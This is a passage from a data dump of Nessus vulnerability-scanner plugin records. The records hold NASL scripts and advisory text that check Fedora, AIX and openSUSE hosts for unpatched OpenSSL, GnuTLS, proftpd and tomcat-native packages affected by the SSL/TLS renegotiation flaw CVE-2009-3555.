script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"tomcat-native-1.1.18-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat-native\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T06:40:55", "bulletinFamily": "scanner", "description": "The version of OpenSSL running on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A vulnerability in the way SSL and TLS protocols allow\n renegotiation requests may allow an attacker to inject\n plaintext into an application protocol stream. This\n could result in a situation where the attacker may be\n able to issue commands to the server that appear to be\n coming from a legitimate source.\n\n - A remote, unauthenticated attacker may be able to inject\n an arbitrary amount of chosen plaintext into the\n beginning of the application protocol stream. This could\n allow an attacker to issue HTTP requests or take action\n impersonating the user, among other consequences.\n\nPlease note that the recommended fixes will disable all session\nrenegotiation.", "modified": "2020-02-02T00:00:00", "id": "AIX_SSL_ADVISORY.NASL", "href": "https://www.tenable.com/plugins/nessus/73566", "published": "2014-04-16T00:00:00", "title": "AIX OpenSSL Advisory : ssl_advisory.asc", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ssl_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73566);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/16 14:13:03\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"CERT\", value:\"120541\");\n script_xref(name:\"EDB-ID\", value:\"9972\");\n\n script_name(english:\"AIX OpenSSL Advisory : ssl_advisory.asc\");\n script_summary(english:\"Checks the version of the openssl packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote AIX host is running a vulnerable version of OpenSSL.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of OpenSSL running on the remote host is affected by the\nfollowing vulnerabilities :\n\n - A vulnerability in the way SSL and TLS protocols allow\n renegotiation requests may allow an attacker to inject\n plaintext into an application protocol stream. This\n could result in a situation where the attacker may be\n able to issue commands to the server that appear to be\n coming from a legitimate source.\n\n - A remote, unauthenticated attacker may be able to inject\n an arbitrary amount of chosen plaintext into the\n beginning of the application protocol stream. This could\n allow an attacker to issue HTTP requests or take action\n impersonating the user, among other consequences.\n\nPlease note that the recommended fixes will disable all session\nrenegotiation.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://aix.software.ibm.com/aix/efixes/security/ssl_advisory.asc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\");\n script_set_attribute(attribute:\"solution\", value:\n\"A fix is available, and it can be downloaded from the AIX website.\n\nTo extract the fixes from the tar file :\n\n zcat openssl.0.9.8.1102.tar.Z | tar xvf -\n or\n zcat openssl-fips.12.9.8.1102.tar.Z | tar xvf -\n or\n zcat openssl.0.9.8.805.tar.Z | tar xvf -\n\nIMPORTANT : If possible, it is recommended that a mksysb backup of\nthe system be created. Verify it is both bootable and readable\nbefore proceeding.\n\nTo preview the fix installation :\n\n installp -apYd . openssl\n\nTo install the fix package :\n\n installp -aXYd . openssl\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/16\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\ninclude(\"aix.inc\");\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item_or_exit(\"Host/AIX/version\");\nif ( oslevel != \"AIX-5.2\" && oslevel != \"AIX-5.3\" && oslevel != \"AIX-6.1\" )\n{\n oslevel = ereg_replace(string:oslevel, pattern:\"-\", replace:\" \");\n audit(AUDIT_OS_NOT, \"AIX 5.2 / 5.3 / 6.1\", oslevel);\n}\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif (aix_check_package(release:\"5.2\", package:\"openssl.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"0.9.8.804\", fixpackagever:\"0.9.8.805\") > 0) flag++;\nif (aix_check_package(release:\"5.3\", package:\"openssl.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"0.9.8.1101\", fixpackagever:\"0.9.8.1102\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", package:\"openssl.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"0.9.8.1101\", fixpackagever:\"0.9.8.1102\") > 0) flag++;\nif (aix_check_package(release:\"5.3\", package:\"openssl-fips.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"12.9.8.1101\", fixpackagever:\"12.9.8.1102\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", package:\"openssl-fips.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"12.9.8.1101\", fixpackagever:\"12.9.8.1102\") > 0) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : aix_report_get()\n );\n}\nelse\n{\n tested = aix_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl.base / openssl-fips.base\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T02:13:57", "bulletinFamily": "scanner", "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache", "modified": "2020-02-02T00:00:00", "id": "SUSE_11_2_COMPAT-OPENSSL097G-091113.NASL", "href": "https://www.tenable.com/plugins/nessus/42839", "published": "2009-11-18T00:00:00", "title": "openSUSE Security Update : compat-openssl097g (compat-openssl097g-1548)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update compat-openssl097g-1548.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42839);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/10/25 13:36:35\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : compat-openssl097g (compat-openssl097g-1548)\");\n script_summary(english:\"Check for the compat-openssl097g-1548 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. (CVE-2009-3555: CVSS v2 Base Score: 6.4)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=553641\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected compat-openssl097g packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:compat-openssl097g\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:compat-openssl097g-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"compat-openssl097g-0.9.7g-149.5.3\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-149.5.3\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T02:13:47", "bulletinFamily": "scanner", "description": "This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.", "modified": "2020-02-02T00:00:00", "id": "SUSE_11_1_GNUTLS-101206.NASL", "href": "https://www.tenable.com/plugins/nessus/53661", "published": "2011-05-05T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3647.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53661);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:38\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)\");\n script_summary(english:\"Check for the gnutls-3647 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00051.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"gnutls-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-devel-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-extra-devel-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls-extra26-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libgnutls26-2.4.1-24.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-24.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T02:14:06", "bulletinFamily": "scanner", "description": "The SSL-renegotiation ", "modified": "2020-02-02T00:00:00", "id": "SUSE_11_3_GNUTLS-101025.NASL", "href": "https://www.tenable.com/plugins/nessus/75521", "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3388.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(75521);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/25 13:36:39\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-1)\");\n script_summary(english:\"Check for the gnutls-3388 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SSL-renegotiation 'authentication gap' has been fixed in gnutls.\nCVE-2009-3555 has been assigned to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"gnutls-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-devel-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-extra-devel-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-extra26-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls26-2.8.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.8.6-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T07:09:03", "bulletinFamily": "scanner", "description": "This update addresses CVE-2009-3555 (SSL/TLS renegotiation\nvulnerability), mitigating the problem by refusing all\nclient-initiated SSL/TLS session renegotiations. This update to the\nlatest maintenance release also fixes a number of bugs recorded in the\nproftpd bug tracker: - SSL/TLS renegotiation vulnerability\n(CVE-2009-3555, bug 3324) - Failed database transaction can cause\nmod_quotatab to loop (bug 3228) - Segfault in mod_wrap (bug 3332) -\n<Directory> sections can have <Limit> problems (bug 3337) - mod_wrap2\nsegfaults when a valid user retries the USER command (bug 3341) -\nmod_auth_file handles ", "modified": "2020-02-02T00:00:00", "id": "FEDORA_2009-13250.NASL", "href": "https://www.tenable.com/plugins/nessus/43604", "published": "2009-12-28T00:00:00", "title": "Fedora 12 : proftpd-1.3.2c-1.fc12 (2009-13250)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-13250.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43604);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/08/02 13:32:29\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36804, 36935);\n script_xref(name:\"FEDORA\", value:\"2009-13250\");\n\n script_name(english:\"Fedora 12 : proftpd-1.3.2c-1.fc12 (2009-13250)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses CVE-2009-3555 (SSL/TLS renegotiation\nvulnerability), mitigating the problem by refusing all\nclient-initiated SSL/TLS session renegotiations. This update to the\nlatest maintenance release also fixes a number of bugs recorded in the\nproftpd bug tracker: - SSL/TLS renegotiation vulnerability\n(CVE-2009-3555, bug 3324) - Failed database transaction can cause\nmod_quotatab to loop (bug 3228) - Segfault in mod_wrap (bug 3332) -\n<Directory> sections can have <Limit> problems (bug 3337) - mod_wrap2\nsegfaults when a valid user retries the USER command (bug 3341) -\nmod_auth_file handles 'getgroups' request incorrectly (bug 3347) -\nSegfault caused by scrubbing zero- length portion of memory (bug 3350)\nFinally, the behaviour of the MLSD FTP command (used in many modern\nFTP clients to list directories) is fixed for the case when the FTP\nserver's configuration disallows its usage (using a <Limit> clause) in\nsome but not all places (#544002).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=533125\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/033169.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8b4a0b82\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected proftpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:proftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"proftpd-1.3.2c-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"proftpd\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T00:44:52", "bulletinFamily": "scanner", "description": "A vulnerability has been identified and corrected in proftpd :\n\nThe TLS protocol, and the SSL protocol 3.0 and possibly earlier, as\nused in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in\nthe Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l,\nGnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS)\n3.12.4 and earlier, and other products, does not properly associate\nrenegotiation handshakes with an existing connection, which allows\nman-in-the-middle attackers to insert data into HTTPS sessions, and\npossibly other types of sessions protected by TLS or SSL, by sending\nan unauthenticated request that is processed retroactively by a server\nin a post-renegotiation context, related to a plaintext injection\nattack, aka the Project Mogul issue 